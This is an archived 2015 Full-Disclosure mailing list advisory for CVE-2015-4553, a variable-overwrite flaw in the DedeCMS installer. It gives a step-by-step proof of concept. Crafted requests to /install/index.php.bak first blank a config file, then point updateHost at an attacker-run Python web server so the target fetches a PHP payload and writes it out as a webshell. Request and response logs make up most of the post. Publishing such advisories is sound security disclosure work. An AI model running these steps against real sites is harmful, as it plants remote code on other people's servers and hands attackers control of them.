| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <2015061715370773848210@dbappsecurity.com.cn>
Date: Wed, 17 Jun 2015 15:37:07 +0800
From: zise.shi <zise.shi@...ppsecurity.com.cn>
To: fulldisclosure <fulldisclosure@...lists.org>
Cc: bugtraq <bugtraq@...urityfocus.com>, bugtrace <bugtrace@...il.com>
Subject: [FD] [CVE-2015-4553]Dedecms variable coverage leads to getshell
[CVE-2015-4553]Dedecms variable coverage leads to getshell
#############################################################################
#
# DBAPPSECURITY LIMITED http://www.dbappsecurity.com.cn/
#
#############################################################################
#
# CVE ID: CVE-2015-4553
# Subject: Dedecms variable coverage leads to getshell
# Author: zise
# Date: 06.17.2015
#############################################################################
Introduction:
========
dedecms Open source cms
Extensive application
Influence version
Newest dedecms 5.7-sp1 and all old version
Remote getshell
Details:
=======
After the default installation of dedecms
Installation directory
/install/index.php
or
/install/index.php.bak
/install/index.php //run iis apache exploit
/install/index.php.bak //run apache exploit
Step 1
#############################################################################
Clear file contents config_update.php
====File content====
<?php
$updateHost = 'http://updatenew.dedecms.com/base-v57/';
$linkHost = 'http://flink.dedecms.com/server_url.php';
========
http://192.168.204.135/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=../data/admin/config_update.php
###
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2015 06:55:23 GMT
Server: Apache/2.4.12
X-Powered-By: PHP/5.6.6
Vary: User-Agent
Content-Length: 55
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<font color="red">[×]</font> 远程获取失败
###
###After execution file 0 byte ~ho~year~####
2015/06/17 14:55 0 config_update.php
1 file 0 byte
Step 2
#############################################################################
Create local HTTP services
zise:tmp zise$ ifconfig en0
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
inet 119.253.3.18 netmask 0xffffff00 broadcast
zise:tmp zise$ mkdir "dedecms"
zise:tmp zise$ cd dedecms/
zise:dedecms zise$ echo "<?php phpinfo();?>" > demodata.a.txt
zise:dedecms zise$ cd ../
zise:tmp zise$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 -
####
http://192.168.204.135/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=hello.php
&updateHost=http://119.253.3.18:8000/
####
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2015 07:11:18 GMT
Server: Apache/2.4.12
X-Powered-By: PHP/5.6.6
Vary: Accept-Encoding,User-Agent
Content-Length: 81
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<font color="green">[√]</font> 存在(您可以选择安装进行体验)
Attack complete
you webshell
http://192.168.204.135/install/hello.php
======================
zise ^_^
zise.shi@...ppsecurity.com.cn
Security researcher
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists